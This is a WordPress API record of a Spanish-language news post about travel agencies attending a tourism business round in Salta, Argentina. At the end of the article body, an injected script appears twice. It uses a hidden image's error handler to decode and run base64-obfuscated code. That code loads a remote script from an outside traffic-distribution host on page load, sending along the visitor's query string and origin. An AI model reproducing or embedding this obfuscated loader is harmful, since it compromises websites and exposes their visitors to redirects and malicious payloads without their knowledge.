{"id":2793,"date":"2023-06-29T21:09:35","date_gmt":"2023-06-30T00:09:35","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=2793"},"modified":"2025-08-14T00:13:52","modified_gmt":"2025-08-14T03:13:52","slug":"agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenos","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=2793","title":{"rendered":"Agencias de viajes nacionales e internacionales tendr\u00e1n una ronda de negocios con operadores salte\u00f1os"},"content":{"rendered":"\n<p>Las agencias de viajes m\u00e1s importantes del pa\u00eds est\u00e1n en Salta para participar en una jornada de comercializaci\u00f3n. Tambi\u00e9n hay presencia de agencias de Brasil y M\u00e9xico. Ma\u00f1ana a las 9 inician las rondas de negocios en el Centro de Convenciones Salta.<\/p>\n\n\n\n<p>El ministro de Turismo y Deportes,\u00a0<strong>Mario Pe\u00f1a<\/strong>\u00a0recibi\u00f3 hoy en el Museo G\u00fcemes a agentes de viaje de las empresas m\u00e1s importantes del pa\u00eds, tambi\u00e9n a operadores que comercializan Salta en los mercados de Brasil y M\u00e9xico. Tambi\u00e9n estuvieron en la recepci\u00f3n, el presidente de la C\u00e1mara de Turismo de Salta, Gustavo Di M\u00e9cola y la directora ejecutiva de Inprotur, Mar\u00eda Eugenia Cornejo.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img fetchpriority=\"high\" decoding=\"async\" width=\"900\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7717-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios.jpeg\" alt=\"\" class=\"wp-image-2794\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7717-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios.jpeg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7717-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7717-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7717-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7717-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-630x420.jpeg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<p>La presencia en la provincia, se realiza en el marco de la 5\u00b0 Ronda de Negocios de Turismo Nacional e Internacional Salta Invita, organizada por la C\u00e1mara de Turismo de Salta con el apoyo del Ministerio de Turismo. Se trata de un encuentro de comercializaci\u00f3n para operadores tur\u00edsticos nacionales e internacionales, donde los prestadores salte\u00f1os podr\u00e1n mostrar las ofertas de su destino y sus productos.<\/p>\n\n\n\n<p>Las empresas que formar\u00e1n parte de las rondas de negocios con agencias locales son A\u00e9reo, Amahuaca, Quimbaya Tours, Organizaci\u00f3n Piamonte, EstiloPlus, Audamar, Rotativo Express, Pezzati Viajes, Towuer Travel, Conextur, Quarum Travel, Inspira Travel and Incentive, &nbsp;Scenery Travel Service, &nbsp;Esteros, Travel Services, Mega Travel.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"900\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7718-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios.jpeg\" alt=\"\" class=\"wp-image-2795\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7718-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios.jpeg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7718-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7718-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7718-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7718-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-630x420.jpeg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<p>\u201cEstamos agradecidos de tenerlos en Salta, de eso se trata Salta Invita, de negocios pero tambi\u00e9n de que vean en este destino un lugar para el disfrute\u201d, indic\u00f3 el ministro de Turismo y Deportes Mario Pe\u00f1a, quien remarc\u00f3 el trabajo en conjunto que se hace para el crecimiento de Salta en los distintos mercados a trav\u00e9s de la cadena de comercializaci\u00f3n\u201d.<\/p>\n\n\n\n<p>Gustavo Di M\u00e9cola en representaci\u00f3n del sector privado de Salta destac\u00f3 el trabajo en conjunto con el Ministerio, \u201cen Salta eso es una pol\u00edtica de Estado y vemos los resultados en el crecimiento a\u00f1o a a\u00f1o\u201d, finaliz\u00f3.<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><img decoding=\"async\" width=\"900\" height=\"600\" src=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7719-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios.jpeg\" alt=\"\" class=\"wp-image-2796\" srcset=\"https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7719-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios.jpeg 900w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7719-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-300x200.jpeg 300w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7719-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-768x512.jpeg 768w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7719-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-696x464.jpeg 696w, https:\/\/circuitosalta.com.ar\/wp-content\/uploads\/2023\/06\/7719-agencias-de-viajes-nacionales-e-internacionales-tendran-una-ronda-de-negocios-con-operadores-saltenios-630x420.jpeg 630w\" sizes=\"(max-width: 900px) 100vw, 900px\" \/><\/figure>\n\n\n\n<p><strong>Apertura oficial<\/strong><\/p>\n\n\n\n<p>Ma\u00f1ana a las 9 en el Centro de Convenciones Salta se llevar\u00e1 a cabo la apertura oficial del encuentro, posteriormente, iniciar\u00e1n las rondas de negocios entre los 17 operadores nacionales e internacionales y los agentes de viaje salte\u00f1os.<\/p>\n\n\n\n<p>Durante estas sesiones, los operadores tur\u00edsticos locales tendr\u00e1n la oportunidad de presentar sus propuestas y atractivos, fomentando la generaci\u00f3n de alianzas estrat\u00e9gicas y la creaci\u00f3n de nuevos paquetes tur\u00edsticos<\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Las agencias de viajes m\u00e1s importantes del pa\u00eds est\u00e1n en Salta para participar en una jornada de comercializaci\u00f3n. Tambi\u00e9n hay presencia de agencias de Brasil y M\u00e9xico. Ma\u00f1ana a las 9 inician las rondas de negocios en el Centro de Convenciones Salta. El ministro de Turismo y Deportes,\u00a0Mario Pe\u00f1a\u00a0recibi\u00f3 hoy en el Museo G\u00fcemes a [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":2797,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[14],"tags":[],"class_list":{"0":"post-2793","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-anuncios"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2793"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=2793"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2793\/revisions"}],"predecessor-version":[{"id":7041,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/2793\/revisions\/7041"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/2797"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=2793"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=2793"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=2793"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}